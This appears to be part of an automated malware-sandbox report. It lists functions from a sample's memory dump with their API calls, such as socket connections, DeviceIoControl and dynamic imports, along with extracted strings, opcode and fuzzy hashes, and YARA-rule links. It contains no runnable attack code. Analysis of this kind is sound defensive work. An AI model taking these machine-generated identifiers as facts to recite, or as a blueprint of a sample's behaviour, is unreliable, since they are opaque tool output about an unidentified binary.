                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE$Uy
                                                                                                                                                        • API String ID: 1318688329-2488602646
                                                                                                                                                        • Opcode ID: f4003f734de1d067ec0c0e8db02a32a81346b76bfc9815d59c7601b4ae150680
                                                                                                                                                        • Instruction ID: d4c444d80616251c73f7f4b38f337ad77cdf53807062ef0805033bb5520c108c
                                                                                                                                                        • Opcode Fuzzy Hash: f4003f734de1d067ec0c0e8db02a32a81346b76bfc9815d59c7601b4ae150680
                                                                                                                                                        • Instruction Fuzzy Hash: FC51A371C052589EDB50EBA9D941BEDBBB4EF45300F6081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040B4C5, Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0040B4CA
                                                                                                                                                        • _strlen.LIBCMT ref: 0040B4F2
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 0040B53C
                                                                                                                                                        • _strlen.LIBCMT ref: 0040B583
                                                                                                                                                        • _strlen.LIBCMT ref: 0040B5CA
                                                                                                                                                        • _strlen.LIBCMT ref: 0040B614
                                                                                                                                                        • _strlen.LIBCMT ref: 0040B673
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE$xky
                                                                                                                                                        • API String ID: 1318688329-2717832531
                                                                                                                                                        • Opcode ID: 57aec4366f0b49bf4bf8b4ec5e4f4d1053b1e6fda76c30a959c0eac196c34a10
                                                                                                                                                        • Instruction ID: b65b756b29263e9867de9677f4c68d28238f674d42f6cb30e6c92a3ced2b383d
                                                                                                                                                        • Opcode Fuzzy Hash: 57aec4366f0b49bf4bf8b4ec5e4f4d1053b1e6fda76c30a959c0eac196c34a10
                                                                                                                                                        • Instruction Fuzzy Hash: EC519371C052589EDB50EBA9D941BEDBBB4EF55300F2081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00696430, Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 414COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,000000D9,?,?), ref: 006964E0
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,000000D9,?,?), ref: 00696503
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Module$FileHandleName
                                                                                                                                                        • String ID: (Press Retry to debug the application - JIT must be enabled)$)K7~$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program:
                                                                                                                                                        • API String ID: 4146042529-5849175
                                                                                                                                                        • Opcode ID: 540c93f517aa2d751a61a81fb0aff9173a0a89e05239d5a94de0ef3a53f61a22
                                                                                                                                                        • Instruction ID: 4859052c459d8a02cf1cac4d5456087f6971aff21903e24fe749f3c83e5bcecf
                                                                                                                                                        • Opcode Fuzzy Hash: 540c93f517aa2d751a61a81fb0aff9173a0a89e05239d5a94de0ef3a53f61a22
                                                                                                                                                        • Instruction Fuzzy Hash: F2D10CB1A4030A6BDF24AE24CD85FFA73BEEF64704F044599FC09A2645F6349E528E51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00418CC6, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 310networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00418CCA
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00418CD5
                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 00418D09
                                                                                                                                                        • _strlen.LIBCMT ref: 00418E26
                                                                                                                                                        • htons.WS2_32(00000000), ref: 00418E5F
                                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 00418E82
                                                                                                                                                        • setsockopt.WS2_32(00000000,0000FFFF,00001006,000003E8,00000004), ref: 00418EA3
                                                                                                                                                        • connect.WS2_32(?,?,00000010), ref: 00418F4F
                                                                                                                                                        • closesocket.WS2_32(?), ref: 00418FFE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionException@8H_prologRaiseThrow_strlenclosesocketconnectgethostbynamehtonssetsockoptsocket
                                                                                                                                                        • String ID: m$q$r
                                                                                                                                                        • API String ID: 216033180-2449510233
                                                                                                                                                        • Opcode ID: ba7918fb018a93956d7d1b728c6e336422f1ecb418a0304d76bb1828997ca23e
                                                                                                                                                        • Instruction ID: 2d9bc025682d35bed8f24ea70904041e7ba9f01175c9b8762ca20ede936a9fa8
                                                                                                                                                        • Opcode Fuzzy Hash: ba7918fb018a93956d7d1b728c6e336422f1ecb418a0304d76bb1828997ca23e
                                                                                                                                                        • Instruction Fuzzy Hash: 56C11271900348AEDB10DFA8D8817EEBBB9EF58304F10416EE509A72A1EB785EC5CB55
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006AA1ED, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 006AA231
                                                                                                                                                          • Part of subcall function 006A958B: _free.LIBCMT ref: 006A95A8
                                                                                                                                                          • Part of subcall function 006A958B: _free.LIBCMT ref: 006A95BA
                                                                                                                                                          • Part of subcall function 006A958B: _free.LIBCMT ref: 006A95CC
                                                                                                                                                          • Part of subcall function 006A958B: _free.LIBCMT ref: 006A95DE
                                                                                                                                                          • Part of subcall function 006A958B: _free.LIBCMT ref: 006A95F0
                                                                                                                                                          • Part of subcall function 006A958B: _free.LIBCMT ref: 006A9602
                                                                                                                                                          • Part of subcall function 006A958B: _free.LIBCMT ref: 006A9614
                                                                                                                                                          • Part of subcall function 006A958B: _free.LIBCMT ref: 006A9626
                                                                                                                                                          • Part of subcall function 006A958B: _free.LIBCMT ref: 006A9638
                                                                                                                                                          • Part of subcall function 006A958B: _free.LIBCMT ref: 006A964A
                                                                                                                                                          • Part of subcall function 006A958B: _free.LIBCMT ref: 006A965C
                                                                                                                                                          • Part of subcall function 006A958B: _free.LIBCMT ref: 006A966E
                                                                                                                                                          • Part of subcall function 006A958B: _free.LIBCMT ref: 006A9680
                                                                                                                                                        • _free.LIBCMT ref: 006AA226
                                                                                                                                                          • Part of subcall function 0069742F: RtlFreeHeap.NTDLL(00000000,00000000,?,006A9CF8,?,00000000,?,00000000,?,006A9F9C,?,00000007,?,?,006AA385,?), ref: 00697445
                                                                                                                                                          • Part of subcall function 0069742F: GetLastError.KERNEL32(?,?,006A9CF8,?,00000000,?,00000000,?,006A9F9C,?,00000007,?,?,006AA385,?,?), ref: 00697457
                                                                                                                                                        • _free.LIBCMT ref: 006AA248
                                                                                                                                                        • _free.LIBCMT ref: 006AA25D
                                                                                                                                                        • _free.LIBCMT ref: 006AA268
                                                                                                                                                        • _free.LIBCMT ref: 006AA28A
                                                                                                                                                        • _free.LIBCMT ref: 006AA29D
                                                                                                                                                        • _free.LIBCMT ref: 006AA2AB
                                                                                                                                                        • _free.LIBCMT ref: 006AA2B6
                                                                                                                                                        • _free.LIBCMT ref: 006AA2EE
                                                                                                                                                        • _free.LIBCMT ref: 006AA2F5
                                                                                                                                                        • _free.LIBCMT ref: 006AA312
                                                                                                                                                        • _free.LIBCMT ref: 006AA32A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                                        • Opcode ID: d86c3d945633648a0dc0cde3a1acee7beff3f4bf0a0218c8f8eafb557f1e6794
                                                                                                                                                        • Instruction ID: 252afd2d7d45e23f16069e07bc548d3084791333cfb77263bed91f5bc8a86aa2
                                                                                                                                                        • Opcode Fuzzy Hash: d86c3d945633648a0dc0cde3a1acee7beff3f4bf0a0218c8f8eafb557f1e6794
                                                                                                                                                        • Instruction Fuzzy Hash: B83191316043019FEF61BAB8D805B9AB7EBEF02710F54841EE548D7652DF31ADA1CB25
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00417EF3, Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 336networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00417EF7
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00417F02
                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 00417F39
                                                                                                                                                        • htons.WS2_32(00000000), ref: 00418070
                                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 004181A5
                                                                                                                                                        • connect.WS2_32(00000000,?,00000010), ref: 004181BC
                                                                                                                                                        • _strlen.LIBCMT ref: 004181EC
                                                                                                                                                        • closesocket.WS2_32(00000000), ref: 00418203
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionException@8H_prologRaiseThrow_strlenclosesocketconnectgethostbynamehtonssocket
                                                                                                                                                        • String ID: !$Disconnected$Q
                                                                                                                                                        • API String ID: 3301139658-2566322903
                                                                                                                                                        • Opcode ID: 9d4d418342b558cabaff98ea57da7b2fd2e08823a8b8ab3395281726c27c97be
                                                                                                                                                        • Instruction ID: a520ae03505f43466df6a143b79721f80eba07725f595141faa3ecfdd5fbf314
                                                                                                                                                        • Opcode Fuzzy Hash: 9d4d418342b558cabaff98ea57da7b2fd2e08823a8b8ab3395281726c27c97be
                                                                                                                                                        • Instruction Fuzzy Hash: 8CD1F17190064CAEDB11DFA8DC41BEDBBB8FF15304F10426EF905A71A2EB785A85CB58
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041839A, Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 312networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041839E
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004183A9
                                                                                                                                                        • socket.WS2_32(00000002,00000002,00000011), ref: 004183D9
                                                                                                                                                        • WSAStartup.WS2_32(00000101,?), ref: 004183F0
                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 0041850F
                                                                                                                                                        • htons.WS2_32(00000000), ref: 00418678
                                                                                                                                                          • Part of subcall function 0044A710: __EH_prolog.LIBCMT ref: 0044A715
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                          • Part of subcall function 0041D156: __Thrd_sleep.LIBCPMT ref: 0041D1E9
                                                                                                                                                        • closesocket.WS2_32(00000000), ref: 00418787
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$DeallocateExceptionException@8RaiseStartupThrd_sleepThrowclosesocketgethostbynamehtonssocketstd::_
                                                                                                                                                        • String ID: >$D$Y$Z
                                                                                                                                                        • API String ID: 3222636790-1645595842
                                                                                                                                                        • Opcode ID: 8e997e4ea2a0f8a8daf20eda9f9f516b10bd11e1442fd79fa792d0f4707801d3
                                                                                                                                                        • Instruction ID: 35b9b44382151ecbdcc3e05d1a6b10460cee50d629e161814eff3a5c7a046554
                                                                                                                                                        • Opcode Fuzzy Hash: 8e997e4ea2a0f8a8daf20eda9f9f516b10bd11e1442fd79fa792d0f4707801d3
                                                                                                                                                        • Instruction Fuzzy Hash: 74C1D07090034CEEEB10DFA8DC45BEDBBB8EF15304F10416EE905A72A2EB785A85CB55
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004B440C, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 182COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004B4411
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004B45D4
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B45E3
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B4611
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B45A3
                                                                                                                                                          • Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B4635
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::exception::exception$ExceptionException@8H_prologRaiseThrow___std_exception_copy
                                                                                                                                                        • String ID: ]sB$attribute && !attribute->parent()$expected ' or "$expected =$expected attribute name
                                                                                                                                                        • API String ID: 4183761955-3982853885
                                                                                                                                                        • Opcode ID: bf1c098992a9234b3976b60dafabefccaf714d8a5636b969210f1e993cad812e
                                                                                                                                                        • Instruction ID: 5c87995e05de95a7ebcdb8ece5e865599b5c18367c0d559d077718e556a72b88
                                                                                                                                                        • Opcode Fuzzy Hash: bf1c098992a9234b3976b60dafabefccaf714d8a5636b969210f1e993cad812e
                                                                                                                                                        • Instruction Fuzzy Hash: 1F71ADB0904605DFCB24CF64C0947EABFF0BF59314F2441AED495AB742C3789A4ADB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004B15E8, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 137COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004B15ED
                                                                                                                                                          • Part of subcall function 004B2FC2: __EH_prolog.LIBCMT ref: 004B2FC7
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B163C
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004B166A
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B16A0
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B1714
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B1774
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::exception::exception$H_prolog$Exception@8Throw
                                                                                                                                                        • String ID: Ltm$]sB$expected >$expected element local name$expected element name or prefix
                                                                                                                                                        • API String ID: 1492573370-3363373362
                                                                                                                                                        • Opcode ID: 8ee9258233df381037123bc0141be3269bc28f98fe406d1b0ae333051bbbcfae
                                                                                                                                                        • Instruction ID: 46814a947683c0c4c2a0cd57a4a4caecfe55f8fe3f1ccb444bc1f2da2610baef
                                                                                                                                                        • Opcode Fuzzy Hash: 8ee9258233df381037123bc0141be3269bc28f98fe406d1b0ae333051bbbcfae
                                                                                                                                                        • Instruction Fuzzy Hash: 0551D2B09042548FDF24DF68C464BEABBF0BF19304F5441AED48167762D77C1A06DBAA
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00418804, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 320networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00418808
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00418813
                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 0041884A
                                                                                                                                                        • htons.WS2_32(00000000), ref: 00418980
                                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 00418A33
                                                                                                                                                        • connect.WS2_32(00000000,?,00000010), ref: 00418A4E
                                                                                                                                                        • closesocket.WS2_32(00000000), ref: 00418B60
                                                                                                                                                          • Part of subcall function 0041D156: __Thrd_sleep.LIBCPMT ref: 0041D1E9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionException@8H_prologRaiseThrd_sleepThrowclosesocketconnectgethostbynamehtonssocket
                                                                                                                                                        • String ID: GET /$M$d
                                                                                                                                                        • API String ID: 3725675640-1107666099
                                                                                                                                                        • Opcode ID: d77c35143a0632c0fc2a80f5564f7332ec1539c8aa529afbf3dbdad479eb824c
                                                                                                                                                        • Instruction ID: 9b7baaba5424cb5545f40191429bc043d98c3edb0c514d8ee0c770f26a5fa6fa
                                                                                                                                                        • Opcode Fuzzy Hash: d77c35143a0632c0fc2a80f5564f7332ec1539c8aa529afbf3dbdad479eb824c
                                                                                                                                                        • Instruction Fuzzy Hash: 25D1E07190064CDEEB01DFA8D841AEDBBB8FF19304F10826EF505A71A1EB785A85CB59
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A2E68, Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 154COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RtlDecodePointer.NTDLL(00000000), ref: 006A2E8B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DecodePointer
                                                                                                                                                        • String ID: )K7~$0A$acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                        • API String ID: 3527080286-2913128658
                                                                                                                                                        • Opcode ID: dc475536c57bb4284f6654862b2378a91c74b386d517da7b3eef608dfe3f0401
                                                                                                                                                        • Instruction ID: 6f7b7f455ecb60374e68c74d5cc54e10efa06fe8d286a3d359277e8a127d8e40
                                                                                                                                                        • Opcode Fuzzy Hash: dc475536c57bb4284f6654862b2378a91c74b386d517da7b3eef608dfe3f0401
                                                                                                                                                        • Instruction Fuzzy Hash: 6F515BB094451ACBCF10AF6CDA585EDBBB6FF4A300F204199E481A6368CB758E65CF18
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0069DBCD, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 266COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 006A0BBE: GetLastError.KERNEL32(?,?,0068BA4F,0077A468,00000010), ref: 006A0BC2
                                                                                                                                                          • Part of subcall function 006A0BBE: _free.LIBCMT ref: 006A0BF5
                                                                                                                                                          • Part of subcall function 006A0BBE: SetLastError.KERNEL32(00000000), ref: 006A0C36
                                                                                                                                                          • Part of subcall function 006A0BBE: _abort.LIBCMT ref: 006A0C3C
                                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 0069DE77
                                                                                                                                                        • _free.LIBCMT ref: 0069DEE8
                                                                                                                                                        • _free.LIBCMT ref: 0069DF01
                                                                                                                                                        • _free.LIBCMT ref: 0069DF33
                                                                                                                                                        • _free.LIBCMT ref: 0069DF3C
                                                                                                                                                        • _free.LIBCMT ref: 0069DF48
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                        • String ID: )K7~$0A$C
                                                                                                                                                        • API String ID: 1679612858-43918621
                                                                                                                                                        • Opcode ID: a27a8618dc673627d6529506f1381acfd4a3b4803ccc8673683fe1408fc20bf5
                                                                                                                                                        • Instruction ID: f0d411a40c32b7c201bf1ff9f3f8416be8c181d089752856fd746915b6cd7c8e
                                                                                                                                                        • Opcode Fuzzy Hash: a27a8618dc673627d6529506f1381acfd4a3b4803ccc8673683fe1408fc20bf5
                                                                                                                                                        • Instruction Fuzzy Hash: F2B13875A01219DBDF24DF18C884AADB7BAFF18314F5045AEE909A7790E770AE91CF40
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041AAF2, Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 221COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041AAF6
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041AB01
                                                                                                                                                          • Part of subcall function 00478772: __EH_prolog.LIBCMT ref: 00478777
                                                                                                                                                          • Part of subcall function 00478772: GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00478826
                                                                                                                                                          • Part of subcall function 00478772: GetProcAddress.KERNEL32(00000000), ref: 0047882D
                                                                                                                                                          • Part of subcall function 00414332: std::_Throw_Cpp_error.LIBCPMT ref: 0041433D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$AddressCpp_errorExceptionException@8HandleModuleProcRaiseThrowThrow_std::_
                                                                                                                                                        • String ID: B$T-x$a|B$a|B$r$|$|,x
                                                                                                                                                        • API String ID: 3644655947-2653391503
                                                                                                                                                        • Opcode ID: 0a50b3fa63d224b010c677401522f51e47b3ffb949ec67ce68addecefbca7cff
                                                                                                                                                        • Instruction ID: b1051e582c7afd316f5a55349c15d545ebf5893fbf8750c5ac2e665e29032e3a
                                                                                                                                                        • Opcode Fuzzy Hash: 0a50b3fa63d224b010c677401522f51e47b3ffb949ec67ce68addecefbca7cff
                                                                                                                                                        • Instruction Fuzzy Hash: 0D81C371D0424CAEDB04DFE9D841BEDBBB8AF14304F20822FF515A7191EB785A85CB65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C7030, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 145COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0042662F: __EH_prolog.LIBCMT ref: 00426634
                                                                                                                                                          • Part of subcall function 005C6650: CreateFileW.KERNEL32(00000000,00000007,00000007,00000007,00000007,00000007,00000007,005C6B4D,kv\,00000000,00000007,00000000,00000003,02200000,00000000,7E374B29), ref: 005C6672
                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,?,7E374B29,?,00000000,00000000), ref: 005C70BD
                                                                                                                                                        • new.LIBCMT ref: 005C70F4
                                                                                                                                                        • DeviceIoControl.KERNEL32(?,000900A8,00000000,00000000,00000000,00004000,000000FF,00000000), ref: 005C712E
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,7E374B29,?,00000000,00000000), ref: 005C7138
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$ControlCreateDeviceFileH_prolog
